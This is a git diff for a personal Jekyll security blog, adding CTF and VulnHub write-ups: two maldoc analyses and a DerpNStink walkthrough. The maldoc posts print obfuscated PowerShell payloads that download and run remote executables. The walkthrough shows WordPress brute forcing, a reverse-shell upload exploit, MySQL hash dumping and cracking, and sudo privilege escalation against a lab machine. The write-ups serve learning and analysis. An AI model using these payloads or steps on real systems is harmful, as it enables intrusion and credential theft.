abhishekakade
diff --git a/‎_config.yml
+12-12 b/‎_config.yml
+12-12
diff --git a/‎_posts/2021-04-27-HTB-CTF-AlienPhish.md
+33 b/‎_posts/2021-04-27-HTB-CTF-AlienPhish.md
+33
diff --git a/‎_posts/2021-04-27-HTB-CTF-Invitation.md
+40 b/‎_posts/2021-04-27-HTB-CTF-Invitation.md
+40
diff --git a/‎_posts/2021-05-06-VulnHub-DerpNStink.md
+234 b/‎_posts/2021-05-06-VulnHub-DerpNStink.md
+234
@@ -14,32 +14,32 @@ timezone:
 # jekyll-seo-tag settings › https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
 # ↓ --------------------------
 
-title: Chirpy # the main title
+title: Abhishek's Blog # the main title
 
-tagline: A text-focused Jekyll theme # it will display as the sub-title
+tagline: Notes, Posts, Writeups # it will display as the sub-title
 
 description: >- # used by seo meta and the atom feed
-  A minimal, responsive and feature-rich Jekyll theme for technical writing.
+  Abhishek's Blog - Software Developer, Penetration Testing, Cyber Security
 
 # Fill in the protocol & hostname for your site.
 # e.g. 'https://username.github.io', note that it does not end with a '/'.
-url: ""
+url: "https://abhishekakade.github.io"
 
 github:
-  username: github_username # change to your github username
+  username: abhishekakade # change to your github username
 
 twitter:
-  username: twitter_username # change to your twitter username
+  username:  # change to your twitter username
 
 social:
   # Change to your full name.
   # It will be displayed as the default author of the posts and the copyright owner in the Footer
-  name: your_full_name
-  email: example@domain.com # change to your email address
+  name: Abhishek K
+  email: 0xkirito@protonmail.com # change to your email address
   links:
     # The first element serves as the copyright owner's link
-    - https://twitter.com/username # change to your twitter homepage
-    - https://github.com/username # change to your github homepage
+    - https://twitter.com/0xKirito # change to your twitter homepage
+    - https://github.com/abhishekakade # change to your github homepage
     # Uncomment below to add more social links
     # - https://www.facebook.com/username
     # - https://www.linkedin.com/in/username
@@ -86,7 +86,7 @@ pageviews:
 #     light  - Use the light color scheme
 #     dark   - Use the dark color scheme
 #
-theme_mode: # [light | dark]
+theme_mode: dark # [light | dark]
 
 # The CDN endpoint for media resources.
 # Notice that once it is assigned, the CDN url
@@ -96,7 +96,7 @@ theme_mode: # [light | dark]
 cdn:
 
 # the avatar on sidebar, support local or CORS resources
-avatar:
+avatar: "/assets/img/kirito.jpeg"
 
 # The URL of the site-wide social preview image used in SEO `og:image` meta tag.
 # It can be overridden by a customized `page.image` in front matter.
 
@@ -0,0 +1,33 @@
+---
+title: "HTB Cyber Apocalypse CTF - AlienPhish"
+# author:
+#   name: 0xKirito
+#   link: https://github.com/0xKirito
+date: 2021-04-27T05:17:41+05:30
+categories: [Writeups, CTF]
+tags: [HTB, CTF, Forensics, Maldocs, Malware Analysis]
+render_with_liquid: false
+---
+
+## AlienPhish - PowerPoint File Forensics
+
+- I came up with this cool little trick on the spot and decided to use VS Code to just search through all the files at once.
+- Extract the PowerPoint file with `unzip file.pptx` and then open the entire directory in VS Code (`code .` if you have it set up that way in terminal/env) for searching through all the files quickly and easily. I use VS Code. You can use any other code editor you use/like that can search through all the files at once (or you could use `grep` but I'd rather go through everything with a code editor when doing any kind of file forensics).
+- Search for keywords like `vba`, `cmd`, `exe`, etc.
+- Found what I wanted immediately in `slide1.xml.rels` file with `cmd` and `exe` keyword search.
+- That file had a malicious `cmd` payload in `Target` attribute:
+
+```
+<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&amp;&amp;for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&amp;&amp;if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22" TargetMode="External"/>
+```
+
+```
+"cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&amp;&amp;for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&amp;&amp;if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"
+```
+
+- We can tell from the URL `exe.x/neila.htraeyortsed/:ptth` that some part of the payload is reversed.
+- But the file name that this powershell command is downloading looks like an encoded string.
+- `99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q` looked like an encoded value so went to [CyberChef](https://gchq.github.io/CyberChef/), reversed and decoded to Base64 and got the flag.
+- Encoded Value <span class="fat-arrow">=></span> Reverse <span class="fat-arrow">=></span> `Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99` <span class="fat-arrow">=></span> Base64 Decode <span class="fat-arrow">=></span> Flag <span class="fat-arrow">=></span> `CHTB{pH1sHiNg_w0_m4cr0s>??}`
+- But that flag was not accepted and showed incorrect. Probably some decoding error so I went back to [CyberChef](https://gchq.github.io/CyberChef/) and in Base64 Decoding, there was an option for `URL Safe` decoding which gave <span class="fat-arrow">=></span> `CHTB{pH1sHiNg_w0_m4cr0s???}`. This was one accepted.
+
@@ -0,0 +1,40 @@
+---
+title: "HTB Cyber Apocalypse CTF - Invitation"
+# author:
+#   name: 0xKirito
+#   link: https://github.com/0xKirito
+date: 2021-04-27T05:17:41+05:30
+categories: [Writeups, CTF]
+tags: [HTB, CTF, Forensics, Maldocs, Malware Analysis]
+render_with_liquid: false
+---
+
+## Invitation - Maldoc Analysis Breakdown
+
+- Extract the `.docm` file: `unzip file.docm`. We will get one directory named `word` which will have a `vbaProject.bin` file in it. Thats what we need.
+- Use Python [OleTools](https://github.com/decalage2/oletools) to read the `vbaProject.bin` file.
+- `olevba3 --decode --deobf --reveal vbaProject.bin` (you can play around with these options but `--deobf` flag didn't work for me so had to manually do everything. Maybe I was doing something wrong).
+
+[Trick to deobfuscate malware code from Unicorns of Security's writeup](https://ctftime.org/writeup/27836)
+
+> My favorite trick is always to ask malware to deobfuscate itself for us. It can save a lot of time in case of more complex obfuscation scenarios. In this case I added this one line to the code: `ActiveDocument.Content.InsertAfter Text:=odsuozldxufm` and then ran the macro again.
+
+- We will get hundreds of hex strings (encoded VBA). Use a good code editor to copy all of them at once and paste it in CyberChef.
+- In [CyberChef](https://gchq.github.io/CyberChef/), add 'From Hex', then add 'From Base64', then add 'Remove null bytes' to get rid of all the pesky little dots/periods and hit BAKE!.
+- Decode Hex strings <span class="fat-arrow">=></span> Decode Base64 <span class="fat-arrow">=></span> Remove Null Bytes <span class="fat-arrow">=></span> Manual Code Review.
+- We will find the strings for flag in the code upon code review but they are a bit jumbled up and reversed. So we will need to fix that manually to get the flag. And the flag string is in two different but similar code blocks. So we will also need to piece it together.
+
+```
+SEt ("G8"+"h")  (  " ) )63]Rahc[,'raZ'EcalPeR-  43]Rahc[,)05]Rahc[+87]Rahc[+94]Rahc[(  eCAlpERc-  )';2'+'N'+'1'+'}atem_we'+'n_eht'+'_2N1 = n'+'gerr'+'aZ'(( ( )''niOj-'x'+]3,1[)(GNirTSot.EcNereFeRpEsOBREv$ ( . "  ) ;-jOIn ( lS ("VAR"+"IaB"+"LE:g"+"8H")  ).VALue[ - 1.. - ( ( lS ("VAR"+"IaB"+"LE:g"+"8H")  ).VALue.LengtH)] | IeX
+```
+
+- `atem_we'+'n_eht'+'_2N1` <span class="fat-arrow">=></span> `atem_wen_eht_` <span class="fat-arrow">=></span> `_the_new_meta`
+
+```
+. ( $PshomE[4]+$pshoMe[30]+'x') ( [strinG]::join('' , ([REGeX]::MaTCHES( ")'x'+]31[DIlLeHs$+]1[DiLLehs$ (&| )43]RAhc[]GnIRTs[,'tXj'(eCALPER.)'$','wqi'(eCALPER.)';tX'+'jera_scodlam'+'{B'+'T'+'HCtXj '+'= p'+'gerwqi'(" ,'.' ,'R'+'iGHTtOl'+'eft' ) | FoREaCH-OBJecT {$_.VALUE} ))  )
+```
+
+- `tX'+'jera_scodlam'`
+- The `tXj` or `jXt` reversed, is actually getting replaced with something else as we can see in the code, so it is not a part of the string we need.
+- `era_scodlam` <span class="fat-arrow">=></span> `maldocs_are`
+- And piecing everything together <span class="fat-arrow">=></span> `CHTB{maldocs_are_the_new_meta}`
@@ -0,0 +1,234 @@
+---
+title: "DerpNStink - VulnHub"
+# author:
+#   name: 0xKirito
+#   link: https://github.com/0xKirito
+date: 2021-05-06 04:57:39 +05:30
+categories: [Writeups, VulnHub]
+media_subpath: /assets/img/writeups/derpnstink/
+tags: [VulnHub, WordPress, MySQL]
+render_with_liquid: false
+---
+
+## DerpNStink VulnHub Walkthrough
+
+### Recon & Enumeration
+
+- `sudo netdiscover -i eth0 -r 10.0.2.0/24` 
+- DerpNStink IP: `10.0.2.8` 
+
+#### Nmap
+
+- `nmap -Pn -sS -p- -A 10.0.2.8`
+
+  ```
+  10.0.2.8:21/tcp => vsftpd 3.0.2
+  10.0.2.8:22/tcp => OpenSSH 6.6.1p1 
+  10.0.2.8:80/tcp => Apache httpd 2.4.7 
+  ```
+
+- In HTML source code: 
+```
+flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
+```
+
+#### GoBuster
+
+```
+gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.8 -t 60 -x txt
+```
+
+```
+/weblog        (Status:301) [Size:304] [http://10.0.2.8/weblog/]
+/php           (Status:301) [Size:301] [http://10.0.2.8/php/]   
+/css           (Status:301) [Size:301] [http://10.0.2.8/css/]   
+/js            (Status:301) [Size:300] [http://10.0.2.8/js/]    
+/javascript    (Status:301) [Size:308] [http://10.0.2.8/javascript/]
+/robots.txt    (Status:200) [Size:53]                                   
+/temporary     (Status:301) [Size:307] [http://10.0.2.8/temporary/] 
+/server-status (Status:403) [Size:288]
+```
+- `/weblog` redirected to `http://derpnstink.local/weblog`. So we will need to add it to the hosts file.
+- `echo 10.0.2.8 derpnstink.local | tee -a /etc/hosts`
+- Then visit `http://derpnstink.local/weblog`.
+- Its a WordPress blog. 
+
+---
+
+### Exploitation
+
+```
+wpscan --url http://derpnstink.local/weblog -e at -e ap -e u
+```
+
+```
+WordPress theme in use: twentysixteen
+Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
+Last Updated: 2021-03-09T00:00:00.000Z
+Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
+The version is out of date, the latest version is 2.4
+
+Plugin(s) Identified:
+
+slideshow-gallery
+Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
+Last Updated: 2019-07-12T13:09:00.000Z
+The version is out of date, the latest version is 1.6.12
+Found By: Urls In Homepage (Passive Detection)
+Version: 1.4.6 (100% confidence)
+Found By: Readme - Stable Tag (Aggressive Detection)
+- http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
+Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
+- http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
+
+User(s) Identified:
+- admin
+```
+
+- We got a username: `admin`. Now to brute force for password:
+
+```
+wpscan --url http://derpnstink.local/weblog/ -U admin -P /usr/share/wordlists/rockyou.txt -t 60
+```
+
+```
+Valid Combinations Found:
+Username: admin, Password: admin
+```
+
+- Honestly, I should have just tried `admin:admin` before even running `wpscan` but, oh well.
+- Go to `/weblog/wp-admin/` and log in with `admin` : `admin`
+- Go to Slideshow, click on one of the available ones, in there, under Choose Image option, select a file to upload. Choose PHP reverse shell file (with IP and port changed to connect back to our Kali VM) and it will be accepted without even changing extension. 
+- Or you can use this exploit to upload the shell since we already have user credentials: [WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload](https://www.exploit-db.com/exploits/34681).
+
+```python
+python wp_slideshow_exploit.py -t http://derpnstink.local/weblog -u admin -p admin -f php-shell.php
+```
+
+- Start a netcat listener: `nc -lvnp 1234`
+- Then go back to Slideshow and click on the slideshow that has PHP reverse shell file and we will get a reverse shell as `www-data`. 
+- `cd /var/www/html/weblog` and `ls -la` 
+- We have read access to `wp-config.php` so `cat wp-config.php`
+
+```
+/** The name of the database for WordPress */
+define('DB_NAME', 'wordpress');
+
+/** MySQL database username */
+define('DB_USER', 'root');
+
+/** MySQL database password */
+define('DB_PASSWORD', 'mysql');
+```
+
+- `mysql -u root -p` <span class="fat-arrow">=></span> `mysql` 
+- `show databases;` 
+- `use mysql;` 
+- `show tables;` 
+- `select * from user;` 
+- DerpNStink MySQL Commands:
+
+![DerpNStink MySQL Commands](derpnstink_mysql_commands.png){: w="300" h="400" }
+_DerpNStink MySQL Commands_
+
+
+- Dumping users & passwords from MySQL:
+
+![Dumping Users & Passwords from MySQL](derpnstink_mysql_users_passwords.png){: w="600" h="400" }
+_Dumping Users & Passwords from MySQL_
+
+- And we get a few MySQL password hashes. Used [CrackStation](https://crackstation.net/) to crack them:
+
+```
+root = E74858DB86EBA20BC33D0AECAE8A8108C56B17FA = mysql
+unclestinky = 9B776AFB479B31E8047026F1185E952DD1E530CB = wedgie57
+phpmyadmin = 4ACFE3202A5FF5CF467898FC58AAB1D615029441 = admin
+```
+
+- Lets try `unclestinky : wedgie57` on user `stinky`. 
+- `su stinky` <span class="fat-arrow">=></span> `wedgie57` and it works. 
+- There is a `ftp` directory in `/stinky` and if we keep going in, there is a `key.txt` file which has `ssh` key for user `stinky` 
+
+```
+/home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
+```
+
+- But we can also get it from `/home/stinky/.ssh`
+- `cd /home/stinky/.ssh` and start a python server with `python3 -m http.server 5959` and then get the `id_rsa` key from `derpnstink.local:5959/id_rsa` using a browser or via `wget`. 
+- `chmod 600 id_rsa` and then log in via `ssh`: 
+- `ssh -i id_rsa [email protected]` 
+- `cd /home/stinky/Desktop && ls -la` 
+- `cat flag.txt` 
+
+```
+flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
+```
+
+- `cd /home/stinky/Documents && ls -la` there is a `derpissues.pcap` file. 
+- `strings derpissues.pcap` to get the general idea of traffic recorded. 
+- There are a few HTTP POST requests in there without SSL/TLS, thus, unencrypted. So we can start looking at them. Or we can `grep` for the username we already have: `mrderp`. I tried it both ways. 
+- `strings derpissues.pcap | grep -n mrderp` 
+- This gives 7 results but the first one itself reveals the password that was used while creating the account for `mrderp` and the second one reveals it again when it was used for logging in as `mrderp`. 
+
+```
+56710:action=createuser&_wpnonce_create-user=b250402af6&_wp_http_referer=%2Fweblog%2Fwp-admin%2Fuser-new.php&user_login=mrderp&email=mrderp%40derpnstink.local&first_name=mr&last_name=derp&url=%2Fhome%2Fmrderp&pass1=derpderpderpderpderpderpderp&pass1-text=derpderpderpderpderpderpderp&pass2=derpderpderpderpderpderpderp&pw_weak=on&role=administrator&createuser=Add+New+User
+57149:log=mrderp&pwd=derpderpderpderpderpderpderp&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1
+```
+
+- The other method is to filter POST requests and to look for passwords in unencrypted/plain text parameters. 
+- So to filter the `strings` results for just those POST requests: 
+- `strings derpissues.pcap | grep POST` 
+- It lists all the POST requests but we can filter out the others that we don't need and focus only on POST requests made to `/weblog/wp-login.php` 
+- `strings derpissues.pcap | grep -A 20 "POST /weblog/wp-login.php"` 
+- `grep -A 20` to print the next 20 lines that come after the expected result of `grep`. 
+- Now there are only three such POST requests and the username and password payload being sent through them is in plain text. 
+
+```
+1: log=unclestinky%40derpnstink.local&pwd=wedgie57&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1c3
+2: log=mrderp&pwd=derpderpderpderpderpderpderp&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1
+```
+
+- We already have `stinky`'s or `unclestinky`'s password: `wedgie57` and now we also have `mrderp`'s password: `derpderpderpderpderpderpderp` 
+- `su mrderp` <span class="fat-arrow">=></span> `derpderpderpderpderpderpderp` and we are now logged in as `mrderp`! 
+- `mrderp` : `derpderpderpderpderpderpderp` 
+
+---
+
+### Privilege Escalation
+
+- `sudo -l` <span class="fat-arrow">=></span> `derpderpderpderpderpderpderp`
+
+```
+User mrderp may run the following commands on DeRPnStiNK:
+    (ALL) /home/mrderp/binaries/derpy*
+```
+
+- If you `cd /home/mrderp/Desktop/ && ls`, there is a `helpdesk.log` file which has a pastebin link inside: `https://pastebin.com/RzK9WfGw`. This pastebin also tells us the same thing that `sudo -l` says. 
+- So back to privilege escalation, there is no `/home/mrderp/binaries/` directory so lets create one. 
+- `cd /home/mrderp` and then `mkdir binaries && cd binaries` 
+- Then create a bash script (any script/executable will work here) that we can execute with `sudo`. 
+- `touch derpy.sh` 
+- `echo /bin/bash > derpy.sh` 
+- Then `chmod +x derpy.sh` and then execute it with: 
+`sudo ./derpy.sh` and we are now `root`! 
+- `whoami` <span class="fat-arrow">=></span> `root` 
+- `cd /root/Desktop && ls -la` 
+- `cat flag.txt` 
+
+```
+flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
+
+Congrats on rooting my first VulnOS!
+Hit me up on twitter and let me know your thoughts!
+@securekomodo
+```
+
+<!-- ### Possible Kernel Exploit
+
+- `uname -a` 
+```
+Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
+```
+- Kernel exploit could be possible. Try kernel exploit later. 
+ -->
+